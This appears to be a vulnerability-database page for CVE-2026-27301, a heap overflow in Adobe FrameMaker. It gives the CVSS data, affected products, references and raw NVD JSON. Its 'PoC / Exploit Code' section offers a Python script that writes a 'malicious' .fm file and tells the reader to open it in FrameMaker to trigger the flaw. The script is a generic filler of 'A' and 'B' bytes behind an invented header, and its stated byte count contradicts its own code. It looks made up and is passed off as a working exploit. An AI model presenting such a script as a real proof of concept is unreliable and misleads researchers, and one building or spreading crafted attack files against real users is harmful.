CVE-2026-27301

Description

Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Proof of Concept for CVE-2026-27301
# This script generates a malicious file designed to trigger a heap-based buffer overflow
# in Adobe Framemaker versions <= 2022.8.

def generate_malicious_file(filename):
    # Header for a typical Framemaker file (simplified for PoC)
    header = b'\x00\x00\x00\x00MakerFile'
    
    # Construct a payload that exceeds the expected buffer size
    # Assuming a buffer of 256 bytes, we send 1024 bytes
    padding = b'A' * 256
    overflow_data = b'B' * 800  # Data to overflow the heap buffer
    
    # Combine parts
    payload = header + padding + overflow_data
    
    with open(filename, 'wb') as f:
        f.write(payload)
    
    print(f"[+] Malicious file '{filename}' generated successfully.")
    print(f"[+] Open this file in Adobe Framemaker to trigger the vulnerability.")

if __name__ == "__main__":
    generate_malicious_file("cve_2026_27301_poc.fm")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27301
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27301
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27301/
[4] VulDB https://vuldb.com/cve/CVE-2026-27301
[5] https://helpx.adobe.com/security/products/framemaker/apsb26-36.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27301", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:27.397", "lastModified": "2026-04-15T17:33:11.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}